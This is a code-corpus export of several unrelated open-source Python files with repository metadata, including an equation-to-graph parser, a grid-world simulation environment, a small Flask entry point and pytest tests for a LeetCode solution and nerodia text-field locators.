|
Python
|
app.py
|
johnyenter-briars/Grove
|
a1a3e784b3ae22113d2596ecea019b52aa2c138d
|
[
"MIT"
] | null | null | null |
app.py
|
johnyenter-briars/Grove
|
a1a3e784b3ae22113d2596ecea019b52aa2c138d
|
[
"MIT"
] | null | null | null |
app.py
|
johnyenter-briars/Grove
|
a1a3e784b3ae22113d2596ecea019b52aa2c138d
|
[
"MIT"
] | null | null | null |
# Run with: python[3] -m flask run
from app import app
@app.shell_context_processor
def make_shell_context():
return None
| 18.142857
| 34
| 0.755906
| 21
| 127
| 4.380952
| 0.761905
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009434
| 0.165354
| 127
| 6
| 35
| 21.166667
| 0.858491
| 0.251969
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
97535ff3d5d19686ec6902733ccf45e846fbb86b
| 23
|
py
|
Python
|
tsl2561/__init__.py
|
frillip/tsl2561
|
b974c6b6efced92dd3e63ec423ee72190420a931
|
[
"BSD-3-Clause"
] | 42
|
2015-12-08T22:52:20.000Z
|
2021-05-17T10:19:18.000Z
|
tsl2561/__init__.py
|
frillip/tsl2561
|
b974c6b6efced92dd3e63ec423ee72190420a931
|
[
"BSD-3-Clause"
] | 11
|
2016-06-23T19:24:02.000Z
|
2017-07-31T06:23:54.000Z
|
tsl2561/__init__.py
|
frillip/tsl2561
|
b974c6b6efced92dd3e63ec423ee72190420a931
|
[
"BSD-3-Clause"
] | 17
|
2015-08-30T03:00:10.000Z
|
2020-02-14T09:59:39.000Z
|
from .tsl2561 import *
| 11.5
| 22
| 0.73913
| 3
| 23
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 0.173913
| 23
| 1
| 23
| 23
| 0.684211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9773751a40ec2dadc9f924ad58128a924f03348e
| 22,481
|
py
|
Python
|
graphFromText/graphByEquals.py
|
Pascal1755/Equation-Symbol-Visualization
|
9107b5014eedc83acde2074232efc34e470c363e
|
[
"MIT"
] | null | null | null |
graphFromText/graphByEquals.py
|
Pascal1755/Equation-Symbol-Visualization
|
9107b5014eedc83acde2074232efc34e470c363e
|
[
"MIT"
] | null | null | null |
graphFromText/graphByEquals.py
|
Pascal1755/Equation-Symbol-Visualization
|
9107b5014eedc83acde2074232efc34e470c363e
|
[
"MIT"
] | null | null | null |
import re
from graphFromText.fxnFromText.fxnGraph import getSymbolGraphMulti
##################### Will map x + y = z + u as {'x':['z','u','y']} ##########################
def graphByEquals2(Text):
#"tokenize" or parse according to newline character, \n
listOfEquations = re.split(r'\n',Text)
# strip whitespace, remove tabs and remove blank entries
for k, eq in enumerate(listOfEquations):
eq.strip()
eq.replace("\t","")
listOfEquations[k]= eq.replace(" ","")
while ('' in listOfEquations):
listOfEquations.remove('')
#### Create a graphOfLeft and a graphOfRight based upon the equations in listOfEquations ####
#
#The graphOfLeft will make all symbols on the right hand side point to the left hand symbol
#The graphOfRight will do the opposite and the left hand symbol will point to all right
#hand symbols.
#
#An example:
#From the equation a=b+c, the graphOfLeft would have 'a':['b','c']. This would be
#interpreted as 'b' and 'c' affect 'a'. The graphOfRight would be 'b':['a'] and 'c':['a'].
#This would be interpreted as 'a' depends upon 'b' and also 'a' depends upon 'c'.
graphOfLeft = dict()
graphOfRight = dict()
inputError=None
for k, eq in enumerate(listOfEquations):
result = re.split(r'={1}', eq) # split into LHS and RHS by exactly one equals sign
# Left Hand Side (LHS) is every word to the left of exactly one equals sign
# Right Hand Side (RHS) is every word to the right of exactly one equals sign
# print("LHS:",result[0]," RHS:",result[1]," len=",len(result))
# if there is a LHS and RHS, then it is an assignment or equation. Otherwise, it is not.
# Also, filter out the cases where a <= or >= is found in the result
if (len(result) == 2 and result[0].find("<") == -1 \
and result[0].find(">") == -1 and result[1].find("<") == -1 \
and result[1].find(">") == -1):
#LHS = re.findall(r'\w+', result[0])
#RHS = re.findall(r'\w+', result[1])
foundLeft = re.findall(r'\w+', result[0])
LHS=[]
for expr in foundLeft:
leftMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (leftMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (leftMatch is not None):
LHS.append(leftMatch.group(0))
foundRight = re.findall(r'\w+', result[1])
RHS=[]
for expr in foundRight:
rightMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (rightMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (rightMatch is not None):
RHS.append(rightMatch.group(0))
###### special case for numbers only on RHS ######
if ( len(result[1]) != 0 and len(RHS) == 0 ):
crazy = r'[+-]?\d+\.?\d*[eE][+-]?\d+|[-]?\d+\.\d+|[-]?\d+'
numberMatch = re.findall(crazy, result[1])
if (len(numberMatch) != 0):
for expr in numberMatch:
RHS.append(expr)
if (LHS and RHS):
#If there is more than one entry in the LHS, move LHS[1], LHS[2], etc. over
#to RHS array, leaving LHS[0] alone
if (len(LHS) > 1):
for k in range(1,len(LHS)):
RHS.append(LHS[k])
del LHS[1:len(LHS)]
if (LHS[0] not in graphOfLeft):
graphOfLeft[LHS[0]] = RHS.copy()
else:
for item in RHS:
graphOfLeft[LHS[0]].append(item)
inputError=ValueError('\nconflicting definition in line:\n' + eq)
for key in RHS:
# print(key,LHS[0])
if (key is not None) and (LHS[0] is not None):
if (key not in graphOfRight):
graphOfRight[key] = [LHS[0]]
else:
graphOfRight[key].append(LHS[0])
else:
inputError=ValueError('incomplete equation expression found in line:\n' + eq)
else:
inputError=ValueError('non-equation expression found in line:\n' + eq)
return graphOfLeft, inputError
##################### Will map x + y = z + u as {'x':['z','u','y'],'y':['z','u','x']} #####################
def graphByEquals3(Text):
listOfEquations = re.split(r'\n',Text)
#strip whitespace and remove blank entries
# strip whitespace and remove blank entries
for k, eq in enumerate(listOfEquations):
listOfEquations[k]= eq.replace(" ","")
#print(len(listOfEquations[k]))
while ('' in listOfEquations):
listOfEquations.remove('')
#print(listOfEquations)
graphOfLeft = dict()
graphOfRight = dict()
inputError=None
for k, eq in enumerate(listOfEquations):
result = re.split(r'={1}', eq) # split into LHS and RHS by exactly one equals sign
# Left Hand Side (LHS) is every word to the left of exactly one equals sign
# Right Hand Side (RHS) is every word to the right of exactly one equals sign
# print("LHS:",result[0]," RHS:",result[1]," len=",len(result))
# if there is a LHS and RHS, then it is an assignment or equation. Otherwise, it is not.
# Also, filter out the cases where a <= or >= is found in the result
if (len(result) == 2 and result[0].find("<") == -1 \
and result[0].find(">") == -1 and result[1].find("<") == -1 \
and result[1].find(">") == -1):
#LHS = re.findall(r'\w+', result[0])
#RHS = re.findall(r'\w+', result[1])
foundLeft = re.findall(r'\w+', result[0])
LHS=[]
for expr in foundLeft:
leftMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (leftMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (leftMatch is not None):
LHS.append(leftMatch.group(0))
foundRight = re.findall(r'\w+', result[1])
RHS=[]
for expr in foundRight:
rightMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (rightMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (rightMatch is not None):
RHS.append(rightMatch.group(0))
###### special case for numbers only on RHS ######
if ( len(result[1]) != 0 and len(RHS) == 0 ):
crazy = r'[+-]?\d+\.?\d*[eE][+-]?\d+|[-]?\d+\.\d+|[-]?\d+'
numberMatch = re.findall(crazy,result[1])
if (len(numberMatch) != 0):
for expr in numberMatch:
RHS.append(expr)
if (LHS and RHS):
for k, key in enumerate(LHS):
if (key not in graphOfLeft):
graphOfLeft[key] = RHS.copy()
#print('key = ' + key + ', RHS = ', RHS)
else:
for item in RHS:
if (item not in graphOfLeft[key]):
graphOfLeft[key].append(item)
#inputError=ValueError('conflicting definition in line:\n' + eq)
#print('before adding other left:\n',graphOfLeft)
for kk, otherkey in enumerate(LHS):
if (key is not None) and (otherkey is not None)\
and (key != otherkey)\
and (otherkey not in graphOfLeft[key]):
#print('key = ' + key + ', otherkey = ' + otherkey)
graphOfLeft[key].append(otherkey)
#print(graphOfLeft[key])
#print('it\'s a multi-expression eq.: ' + key + ',' + otherkey + '\n')
for key in RHS:
# print(key,LHS[0])
if (key is not None) and (LHS[0] is not None):
if (key not in graphOfRight):
graphOfRight[key] = [LHS[0]]
else:
graphOfRight[key].append(LHS[0])
else:
inputError=ValueError('incomplete equation expression found in line:\n' + eq)
else:
inputError=ValueError('non-equation expression found in line:\n' + eq)
return graphOfLeft, inputError
##################### Will map x + y = z + u as {'x':['z','u'],'y':['z','u']} ##########################
def graphByEquals4(Text):
listOfEquations = re.split(r'\n',Text)
#strip whitespace and remove blank entries
#strip whitespace and remove blank entries
for k, eq in enumerate(listOfEquations):
listOfEquations[k]= eq.replace(" ","")
#print(len(listOfEquations[k]))
while ('' in listOfEquations):
listOfEquations.remove('')
#print(listOfEquations)
graphOfLeft = dict()
graphOfRight = dict()
inputError=None
for k, eq in enumerate(listOfEquations):
result = re.split(r'={1}', eq) # split into LHS and RHS by exactly one equals sign
# Left Hand Side (LHS) is every word to the left of exactly one equals sign
# Right Hand Side (RHS) is every word to the right of exactly one equals sign
# print("LHS:",result[0]," RHS:",result[1]," len=",len(result))
# if there is a LHS and RHS, then it is an assignment or equation. Otherwise, it is not.
# Also, filter out the cases where a <= or >= is found in the result
if (len(result) == 2 and result[0].find("<") == -1 \
and result[0].find(">") == -1 and result[1].find("<") == -1 \
and result[1].find(">") == -1):
#LHS = re.findall(r'\w+', result[0])
#RHS = re.findall(r'\w+', result[1])
foundLeft = re.findall(r'\w+', result[0])
LHS=[]
for expr in foundLeft:
leftMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (leftMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (leftMatch is not None):
LHS.append(leftMatch.group(0))
foundRight = re.findall(r'\w+', result[1])
RHS=[]
for expr in foundRight:
rightMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (rightMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (rightMatch is not None):
RHS.append(rightMatch.group(0))
###### special case for numbers only on RHS ######
if ( len(result[1]) != 0 and len(RHS) == 0 ):
crazy = r'[+-]?\d+\.?\d*[eE][+-]?\d+|[-]?\d+\.\d+|[-]?\d+'
numberMatch = re.findall(crazy, result[1])
if (len(numberMatch) != 0):
for expr in numberMatch:
RHS.append(expr)
if (LHS and RHS):
for k, key in enumerate(LHS):
if (key not in graphOfLeft):
graphOfLeft[key] = RHS.copy()
#print('key = ' + key + ', RHS = ', RHS)
else:
for item in RHS:
if (item not in graphOfLeft[key]):
graphOfLeft[key].append(item)
#inputError=ValueError('conflicting definition in line:\n' + eq)
#print('before adding other left:\n',graphOfLeft)
#for kk, otherkey in enumerate(LHS):
#if (key is not None) and (otherkey is not None)\
#and (key != otherkey)\
#and (otherkey not in graphOfLeft[key]):
#print('key = ' + key + ', otherkey = ' + otherkey)
#graphOfLeft[key].append(otherkey)
#print(graphOfLeft[key])
#print('it\'s a multi-expression eq.: ' + key + ',' + otherkey + '\n')
for key in RHS:
# print(key,LHS[0])
if (key is not None) and (LHS[0] is not None):
if (key not in graphOfRight):
graphOfRight[key] = [LHS[0]]
else:
graphOfRight[key].append(LHS[0])
else:
inputError=ValueError('incomplete equation expression found in line:\n' + eq)
else:
inputError=ValueError('non-equation expression found in line:\n' + eq)
return graphOfLeft, inputError
##################### Will map z = f(x,y) + u as {'z':['f','u'],'f':['x',y']}, figuratively ###############
##################### Note that the actual graph items are tuples, like ('f',4,'fxn',0,0) #################
##################### The tuples are the following format: (symbolName,character,type,fxnLevel,eqNum) #####
def graphByEqualsFxn1(Text):
    """Parse newline-separated equations and build a multi-symbol graph.

    Each non-blank line must contain exactly one '=' and no '<' / '>'
    (to exclude inequalities).  Tokens that start with a digit but
    continue with letters (e.g. '1x') are illegal.  For every valid
    equation, each left-hand symbol is paired with the full right-hand
    text; the parallel lists are handed to getSymbolGraphMulti.

    Parameters:
        Text (str): equations separated by newlines; spaces are ignored.

    Returns:
        tuple: (symbolGraphMulti, inputError) where symbolGraphMulti is
        the dict built by getSymbolGraphMulti (empty dict on error) and
        inputError is None or the last ValueError describing a bad line.
    """
    listOfEquations = re.split(r'\n', Text)
    # strip whitespace and remove blank entries
    for k, eq in enumerate(listOfEquations):
        listOfEquations[k] = eq.replace(" ", "")
    while '' in listOfEquations:
        listOfEquations.remove('')
    inputError = None
    leftHandLinesOfText = []
    rightHandLinesOfText = []
    for eq in listOfEquations:
        # split into LHS and RHS by exactly one equals sign
        result = re.split(r'={1}', eq)
        # valid only if there is exactly one '=' and no relational
        # operators (filters out <=, >=, <, >) on either side
        if (len(result) == 2 and result[0].find("<") == -1
                and result[0].find(">") == -1 and result[1].find("<") == -1
                and result[1].find(">") == -1):
            foundLeft = re.findall(r'\w+', result[0])
            for expr in foundLeft:
                # a token that starts with digits but contains letters
                # (e.g. '1x') is neither a symbol nor a number
                if (re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*', expr) is None
                        and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
                    inputError = ValueError('\nillegal expression:\n' + expr)
            foundRight = re.findall(r'\w+', result[1])
            for expr in foundRight:
                if (re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*', expr) is None
                        and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
                    inputError = ValueError('\nillegal expression:\n' + expr)
            ##### check RHS for unbalanced parenthesis #####
            parenCnt = 0
            for char in result[1]:
                if char == '(':
                    parenCnt += 1
                elif char == ')':
                    parenCnt -= 1
            if parenCnt != 0:
                inputError = ValueError('\nunbalanced parenthesis:\n' + eq)
            if inputError is None:
                # pair every LHS symbol with the full RHS text, keeping
                # the two lists parallel (fix: the original inner loop
                # reused 'k' and shadowed the outer loop variable)
                for left in foundLeft:
                    leftHandLinesOfText.append(left)
                    rightHandLinesOfText.append(result[1])
        else:
            inputError = ValueError('non-equation expression found in line:\n' + eq)
    #### LHS and RHS are populated ####
    if inputError is None:
        symbolGraphMulti = getSymbolGraphMulti(leftHandLinesOfText, rightHandLinesOfText)
    else:
        symbolGraphMulti = dict()
    return symbolGraphMulti, inputError
'''
##################### Will map x + y = z + u as {'x':['z','u'],'y':['z','u']} ##########################
def graphByEquals4(Text):
listOfEquations = re.split(r'\n',Text)
#strip whitespace and remove blank entries
# strip whitespace and remove blank entries
for k, eq in enumerate(listOfEquations):
listOfEquations[k]= eq.replace(" ","")
#print(len(listOfEquations[k]))
while ('' in listOfEquations):
listOfEquations.remove('')
#print(listOfEquations)
graphOfLeft = dict()
graphOfRight = dict()
inputError=None
for k, eq in enumerate(listOfEquations):
result = re.split(r'={1}', eq) # split into LHS and RHS by exactly one equals sign
# Left Hand Side (LHS) is every word to the left of exactly one equals sign
# Right Hand Side (RHS) is every word to the right of exactly one equals sign
# print("LHS:",result[0]," RHS:",result[1]," len=",len(result))
# if there is a LHS and RHS, then it is an assignment or equation. Otherwise, it is not.
# Also, filter out the cases where a <= or >= is found in the result
if (len(result) == 2 and result[0].find("<") == -1 \
and result[0].find(">") == -1 and result[1].find("<") == -1 \
and result[1].find(">") == -1):
#LHS = re.findall(r'\w+', result[0])
#RHS = re.findall(r'\w+', result[1])
foundLeft = re.findall(r'\w+', result[0])
LHS=[]
for expr in foundLeft:
leftMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (leftMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (leftMatch is not None):
LHS.append(leftMatch.group(0))
#### Under development ####
fxnOnRight=re.search(r'(\w+)\((.*)\)', result[1])
if (fxnOnRight is not None):
fxnName = fxnOnRight.groups(0)
else:
foundRight = re.findall(r'\w+', result[1])
RHS=[]
for expr in foundRight:
rightMatch = re.match(r'^[a-zA-Z]+[0-9a-zA-Z_]*',expr)
if (rightMatch is None \
and re.match(r'^[0-9]+[a-zA-Z_]+', expr) is not None):
inputError = ValueError('\nillegal expression:\n' + expr)
elif (rightMatch is not None):
RHS.append(rightMatch.group(0))
###### special case for numbers only on RHS ######
if ( len(result[1]) != 0 and len(RHS) == 0 ):
num_regex = r'[+-]?\d+\.?\d*[eE][+-]?\d+|[-]?\d+\.\d+|[-]?\d+'
numberMatch = re.findall(num_regex, result[1])
if (len(numberMatch) != 0):
for expr in numberMatch:
RHS.append(expr)
if (LHS and RHS):
for k, key in enumerate(LHS):
if (key not in graphOfLeft):
graphOfLeft[key] = RHS.copy()
#print('key = ' + key + ', RHS = ', RHS)
else:
for item in RHS:
if (item not in graphOfLeft[key]):
graphOfLeft[key].append(item)
#inputError=ValueError('conflicting definition in line:\n' + eq)
#print('before adding other left:\n',graphOfLeft)
#for kk, otherkey in enumerate(LHS):
#if (key is not None) and (otherkey is not None)\
#and (key != otherkey)\
#and (otherkey not in graphOfLeft[key]):
#print('key = ' + key + ', otherkey = ' + otherkey)
#graphOfLeft[key].append(otherkey)
#print(graphOfLeft[key])
#print('it\'s a multi-expression eq.: ' + key + ',' + otherkey + '\n')
for key in RHS:
# print(key,LHS[0])
if (key is not None) and (LHS[0] is not None):
if (key not in graphOfRight):
graphOfRight[key] = [LHS[0]]
else:
graphOfRight[key].append(LHS[0])
else:
inputError=ValueError('incomplete equation expression found in line:\n' + eq)
else:
inputError=ValueError('non-equation expression found in line:\n' + eq)
return graphOfLeft, inputError
'''
| 46.641079
| 107
| 0.488501
| 2,606
| 22,481
| 4.205679
| 0.081351
| 0.018248
| 0.028741
| 0.020073
| 0.861131
| 0.845712
| 0.845712
| 0.843887
| 0.839964
| 0.829836
| 0
| 0.014545
| 0.360838
| 22,481
| 482
| 108
| 46.641079
| 0.748208
| 0.222677
| 0
| 0.837719
| 0
| 0
| 0.087762
| 0.02641
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017544
| false
| 0
| 0.008772
| 0
| 0.04386
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
979a794d31b04edecc9cc8a7d6a3389c2fc8c7df
| 2,586
|
py
|
Python
|
environment.py
|
SSchwoebel/ActiveInferenceBPBethe
|
76301d4495fdbb3940be8580c42a0e82789a921a
|
[
"MIT"
] | 1
|
2020-08-02T06:38:54.000Z
|
2020-08-02T06:38:54.000Z
|
environment.py
|
SSchwoebel/ActiveInferenceBPBethe
|
76301d4495fdbb3940be8580c42a0e82789a921a
|
[
"MIT"
] | null | null | null |
environment.py
|
SSchwoebel/ActiveInferenceBPBethe
|
76301d4495fdbb3940be8580c42a0e82789a921a
|
[
"MIT"
] | 1
|
2021-06-07T15:17:17.000Z
|
2021-06-07T15:17:17.000Z
|
"""This module contains various experimental environments used for testing
human behavior."""
import numpy as np
class GridWorld(object):
    """Grid-world environment that samples observations and hidden-state
    transitions from fixed categorical distributions."""

    def __init__(self, Omega, Theta, trials=1, T=10):
        # observation likelihood: one column of Omega per hidden state
        self.Omega = Omega.copy()
        # transition kernel, indexed as Theta[s', s, a]
        self.Theta = Theta.copy()
        # trajectory record: one row of hidden states per trial
        self.hidden_states = np.zeros((trials, T), dtype=int)

    def set_initial_states(self, tau):
        # every trial starts in state 1 (lower corner)
        self.hidden_states[tau, 0] = 1
        # progress report every 100 trials
        if tau % 100 == 0:
            print("trial:", tau)

    def generate_observations(self, tau, t):
        # one categorical draw from the current state's observation column
        probs = self.Omega[:, self.hidden_states[tau, t]]
        return np.random.multinomial(1, probs).argmax()

    def update_hidden_states(self, tau, t, response):
        # sample the next state given the previous state and the response
        prev = self.hidden_states[tau, t - 1]
        self.hidden_states[tau, t] = np.random.choice(
            self.Theta.shape[0], p=self.Theta[:, prev, int(response)])
"""
test: please ignore
"""
class FakeGridWorld(object):
    """Grid world whose hidden-state trajectory is scripted in advance;
    observations are still sampled, and update_hidden_states overwrites
    the script with sampled transitions."""

    def __init__(self, Omega, Theta, hidden_states, trials=1, T=10):
        # observation likelihood: one column of Omega per hidden state
        self.Omega = Omega.copy()
        # transition kernel, indexed as Theta[s', s, a]
        self.Theta = Theta.copy()
        # replicate the scripted trajectory across all trials
        self.hidden_states = np.zeros((trials, T), dtype=int)
        self.hidden_states[:] = np.array([hidden_states] * trials)

    def set_initial_states(self, tau):
        # every trial starts in state 1 (lower corner)
        self.hidden_states[tau, 0] = 1
        #print("trial:", tau)

    def generate_observations(self, tau, t):
        # one categorical draw from the current state's observation column
        probs = self.Omega[:, self.hidden_states[tau, t]]
        return np.random.multinomial(1, probs).argmax()

    def update_hidden_states(self, tau, t, response):
        # sample the next state given the previous state and the response
        prev = self.hidden_states[tau, t - 1]
        self.hidden_states[tau, t] = np.random.choice(
            self.Theta.shape[0], p=self.Theta[:, prev, int(response)])
| 33.584416
| 88
| 0.596674
| 308
| 2,586
| 4.896104
| 0.25974
| 0.135279
| 0.116711
| 0.100796
| 0.859416
| 0.859416
| 0.823607
| 0.823607
| 0.823607
| 0.823607
| 0
| 0.011142
| 0.305878
| 2,586
| 77
| 89
| 33.584416
| 0.828969
| 0.24478
| 0
| 0.764706
| 0
| 0
| 0.00314
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.235294
| false
| 0
| 0.029412
| 0
| 0.382353
| 0.029412
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
97a8f3a1065c39838501321a97ab9daf3aa5d26c
| 1,074
|
py
|
Python
|
tests/test_1952.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1952.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1952.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pytest
"""
Test 1952. Three Divisors
"""
# Session-scoped factory fixture: builds a single Solution instance once
# and yields a zero-argument callable that returns it to each test.
@pytest.fixture(scope="session")
def init_variables_1952():
from src.leetcode_1952_three_divisors import Solution
solution = Solution()
def _init_variables_1952():
return solution
yield _init_variables_1952
# isThree(n) should be True exactly when n has three positive divisors.
class TestClass1952:
def test_solution_0(self, init_variables_1952):
assert not init_variables_1952().isThree(2)
def test_solution_1(self, init_variables_1952):
assert init_variables_1952().isThree(4)
#!/usr/bin/env python
import pytest
"""
Test 1952. Three Divisors
"""
# Session-scoped factory fixture: builds a single Solution instance once
# and yields a zero-argument callable that returns it to each test.
# NOTE(review): this duplicates the fixture/class defined earlier in the
# file — the second definition shadows the first; confirm intent.
@pytest.fixture(scope="session")
def init_variables_1952():
from src.leetcode_1952_three_divisors import Solution
solution = Solution()
def _init_variables_1952():
return solution
yield _init_variables_1952
# isThree(n) should be True exactly when n has three positive divisors.
class TestClass1952:
def test_solution_0(self, init_variables_1952):
assert not init_variables_1952().isThree(2)
def test_solution_1(self, init_variables_1952):
assert init_variables_1952().isThree(4)
| 18.842105
| 57
| 0.728119
| 138
| 1,074
| 5.333333
| 0.231884
| 0.247283
| 0.32337
| 0.108696
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.100228
| 0.182495
| 1,074
| 56
| 58
| 19.178571
| 0.738041
| 0.037244
| 0
| 1
| 0
| 0
| 0.014493
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 1
| 0.307692
| false
| 0
| 0.153846
| 0.076923
| 0.615385
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
c119212d5c0baad240a7a79a5342c350c59238fb
| 9,855
|
py
|
Python
|
tests/browser/elements/text_field_tests.py
|
harsh183/nerodia
|
69c5e4408432e85b5af0b2da03015f729809dac4
|
[
"MIT"
] | 83
|
2017-11-20T08:41:09.000Z
|
2022-02-09T21:01:47.000Z
|
tests/browser/elements/text_field_tests.py
|
harsh183/nerodia
|
69c5e4408432e85b5af0b2da03015f729809dac4
|
[
"MIT"
] | 28
|
2017-11-21T02:25:03.000Z
|
2021-04-15T15:26:30.000Z
|
tests/browser/elements/text_field_tests.py
|
harsh183/nerodia
|
69c5e4408432e85b5af0b2da03015f729809dac4
|
[
"MIT"
] | 14
|
2017-11-29T06:44:12.000Z
|
2021-09-06T04:53:44.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from re import IGNORECASE, compile
import pytest
from nerodia.exception import ObjectReadOnlyException, UnknownObjectException
pytestmark = pytest.mark.page('forms_with_input_elements.html')
# Locator coverage: every supported selector strategy (id, name, value,
# class_name, index, xpath, label, visible_label, text) should find an
# existing text field and reject a non-existent one.
class TestTextFieldExist(object):
def test_returns_true_if_the_element_exists(self, browser):
assert browser.text_field(id='new_user_email').exists is True
assert browser.text_field(id=compile(r'new_user_email')).exists is True
assert browser.text_field(name='new_user_email').exists is True
assert browser.text_field(name=compile(r'new_user_email')).exists is True
assert browser.text_field(name=compile(r'new_user_occupation', flags=IGNORECASE)).exists is True
assert browser.text_field(value='Developer').exists is True
assert browser.text_field(value=compile(r'Developer')).exists is True
assert browser.text_field(class_name='name').exists is True
assert browser.text_field(class_name=compile(r'name')).exists is True
assert browser.text_field(index=0).exists is True
assert browser.text_field(xpath="//input[@id='new_user_email']").exists is True
assert browser.text_field(label='First name').exists is True
assert browser.text_field(label=compile(r'([qa])st? name')).exists is True
assert browser.text_field(label='Without for').exists is True
assert browser.text_field(label=compile(r'Without for')).exists is True
assert browser.text_field(label='With hidden text').exists is True
assert browser.text_field(visible_label='With text').exists is True
# This will work after text is deprecated for visible_text
# assert browser.text_field(label=compile(r'With hidden text')).exists is True
assert browser.text_field(visible_label=compile(r'With text')).exists is True
def test_locates_value_of_text_field_using_text_locator(self, browser):
assert browser.text_field(text='Developer').exists is True
assert browser.text_field(text=compile(r'Developer')).exists is True
def test_returns_the_first_text_field_if_given_no_args(self, browser):
assert browser.text_field().exists
def test_respects_text_fields_types(self, browser):
assert browser.text_field().type == 'text'
# inputs with a missing, invalid, upper-case, or unknown type attribute
# should still be treated as text fields
def test_returns_true_if_the_element_exists_no_type_attribute(self, browser):
assert browser.text_field(id='new_user_first_name').exists is True
def test_returns_true_if_the_element_exists_invalid_type_attribute(self, browser):
assert browser.text_field(id='new_user_last_name').exists is True
def test_returns_true_for_element_with_upper_case_type(self, browser):
assert browser.text_field(id='new_user_email_confirm').exists is True
def test_returns_true_for_element_with_unknown_type(self, browser):
assert browser.text_field(id='unknown_text_field').exists is True
# negative cases: each strategy must report non-existence
def test_returns_false_if_the_element_does_not_exist(self, browser):
assert browser.text_field(id='no_such_id').exists is False
assert browser.text_field(id=compile(r'no_such_id')).exists is False
assert browser.text_field(name='no_such_name').exists is False
assert browser.text_field(name=compile(r'no_such_name')).exists is False
assert browser.text_field(value='no_such_value').exists is False
assert browser.text_field(value=compile(r'no_such_value')).exists is False
assert browser.text_field(text='no_such_text').exists is False
assert browser.text_field(text=compile(r'no_such_text')).exists is False
assert browser.text_field(class_name='no_such_class').exists is False
assert browser.text_field(class_name=compile(r'no_such_class')).exists is False
assert browser.text_field(index=1337).exists is False
assert browser.text_field(xpath="//input[@id='no_such_id']").exists is False
assert browser.text_field(label='bad_label').exists is False
assert browser.text_field(label=compile(r'bad_label')).exists is False
assert browser.text_field(label='With text').exists is False
assert browser.text_field(visible_label='With hidden text').exists is False
# This will work after text is deprecated for visible_text
# assert browser.text_field(label=compile(r'With text')).exists is False
assert browser.text_field(visible_label=compile(r'With hidden text')).exists is False
